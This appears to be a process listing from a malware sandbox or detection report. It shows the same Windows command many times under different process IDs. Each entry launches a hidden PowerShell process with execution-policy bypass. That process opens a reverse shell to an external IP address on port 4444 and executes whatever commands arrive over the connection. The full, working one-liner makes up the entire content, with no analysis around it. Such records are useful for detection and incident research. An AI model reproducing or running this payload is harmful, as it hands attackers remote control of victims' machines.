C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1280
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4144
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4904
-
-
